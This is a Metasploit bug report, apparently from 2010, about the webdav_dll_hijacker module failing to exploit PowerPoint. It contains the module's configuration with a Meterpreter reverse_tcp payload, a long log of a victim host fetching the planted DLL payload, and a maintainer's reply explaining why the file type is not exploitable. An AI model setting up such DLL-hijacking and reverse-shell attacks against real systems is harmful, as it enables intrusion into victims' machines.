Bug #2462
DLLHijackink exploit dosen't work
| Status: | Rejected | Start date: | 08/27/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | Joshua J. Drake | % Done: | 0% |
|
| Category: | modules - exploits | |||
| Target version: | - | |||
| Resolution: | Release Note: |
Description
when I launch the webdav_dll_hijacker exploit it dosen't work here the output :
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS ppt pptx yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The listen address
LPORT 4444 yes The listen portExploit target:
Id Name
-- ----
0 Automaticmsf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.101:4444
[*]
[*] Exploit links are now available at \\192.168.0.101\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.101:80/
[*] Server started.
msf exploit(webdav_dll_hijacker) > [*] 192.168.0.100:25232 GET => REDIRECT (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents/desktop.ini
[*] 192.168.0.100:25233 PROPFIND => 404 (/documents/desktop.ini)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND /documents/Thumbs.db
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/Thumbs.db)
[*] 192.168.0.100:25238 GET => DATA (/documents/policy.ppt)
[*] 192.168.0.100:25233 LOCK => 404 (/documents/Thumbs.db)
[*] 192.168.0.100:25238 PROPFIND /DOCUMENTS
[*] 192.168.0.100:25238 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.0.100:25233 PROPFIND /DOCUMENTS/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25238 PROPFIND /DOCUMENTS
[*] 192.168.0.100:25238 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.0.100:25233 PROPFIND /DOCUMENTS/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 GET => DLL Payload
snip...
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/rsaenh.dll)
and it continue like that forever.
excepte when office power point crash
History
Updated by HD Moore over 1 year ago
- Status changed from New to Rejected
The file format you are trying is not exploitable; even though the rsaenh DLL is being opened, it is not being initialized. This occurs when rundll32 is used to do the load